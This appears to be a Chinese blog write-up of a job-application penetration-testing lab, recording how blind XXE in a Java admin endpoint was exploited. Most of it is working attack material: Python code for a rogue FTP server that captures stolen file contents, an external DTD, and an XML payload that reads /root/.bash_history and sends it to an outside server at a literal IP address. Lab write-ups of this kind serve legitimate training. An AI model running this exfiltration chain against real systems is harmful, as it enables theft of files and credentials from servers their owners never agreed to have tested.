投简历后,公司下发的靶场 要求60小时内做完(不是我投的简历),简单记录一下过程

扫一遍端口和目录,目录发现admin目录,抓包会看到xml形式传递数据,看看能不能xxe.

经过简单的测试发现可以盲打xxe,而且根据服务器接受的信息来看,靶场是java的.php协议不能用,无法将数据编码传输,所以http传输不能用.用ftp传输即可

这里用ftp://ip/data 来访问ftp服务器其实是没有真正链接上的,所以正常的ftp服务器是不行的.自己搭建一个来接收数据

先搭建一个ftp服务器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

class FTPServer(SocketServer.BaseRequestHandler):
    def handle(self):
        """
        FTP Java handler which can handle reading files
        and directories that are being sent by the server.
        """
        self.request.settimeout(10)
        logger("[+] victim [{}] has connected FTP !".format(self.client_address[0]), is_print=True)
        self.request.sendall("220 ftp-server\n")
        try:
            while True:
                self.data = self.request.recv(4096).strip()
                if self.data.startswith("RETR "):
                    logger("[+] FTP Received File:\n{separator}\n{}\n{separator}".format(self.data.lstrip("RETR "), separator="=" * 50), is_print=True)
                else:
                    in_key = False
                    keys = ["USER", "PASS", "TYPE", "EPRT", "EPSV", "QUIT"]
                    for key in keys:
                        if self.data.startswith(key):
                            in_key = True
                            logger("[+] FTP: {}".format(self.data), is_print=True)
                            break
                    if not in_key:
                        if str(self.data) == '':
                            logger("[*] file exists! maybe target cannot send multi-lines file!(jdk<7u141/jdk<8u162 supported)".format(self.data), is_print=True)
                        else:
                            logger("{}".format(self.data[self.data.find(" ")+1:]), is_print=True)
                if "LIST" in self.data:
                    self.request.sendall("drwxrwxrwx 1 owner group          1 Feb 21 01:11 rsl\n")
                    self.request.sendall("150 Opening BINARY mode data connection for /bin/ls\n")
                    self.request.sendall("226 Transfer complete.\n")
                elif "USER" in self.data:
                    self.request.sendall("331 password please - version check\n")
                elif "PORT" in self.data:
                    logger("[+] FTP PORT received")
                    logger("[+] FTP > 200 PORT command ok")
                    self.request.sendall("200 PORT command ok\n")
                elif "SYST" in self.data:
                    self.request.sendall("215 RSL\n")
                else:
                    logger("[+] FTP > 230 more data please!")
                    self.request.sendall("230 more data please!\n")
        except Exception as e:
            if "timed out" in e:
                logger("[*] FTP Client timed out")
            else:
                logger("[-] FTP Client error: {}".format(e), is_print=True)
        logger("[*] FTP Connection closed with {}".format(self.client_address[0]))


def start_server(conn, serv_class):
    try:
        server = SocketServer.TCPServer(conn, serv_class)
        t = Thread(target=server.serve_forever)
        t.daemon = True
        t.start()
    except socket.error as e:
        if "[Errno 10048]" in str(e):
            exit("[-] Port [{}] is already in use".format(conn[1]))
        else:
            exit(str(e))

python ./xxeftp 2121启动

服务器上的secret.dtd

1
2
<!ENTITY % hacker "<!ENTITY send SYSTEM 'ftp://服务器ip地址:2121/%file;'>">
%hacker;

发送的payload:

1
2
3
4
5
6
7
8
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///root/.bash_history">
<!ENTITY % dtd SYSTEM "http://39.98.35.144:80/secret.dtd"> 
%dtd;
]>
<root><reg><name>admin</name><tel>&send;</tel><email>111111111@qq.com</email></reg></root>

file:// 是可以遍历目录的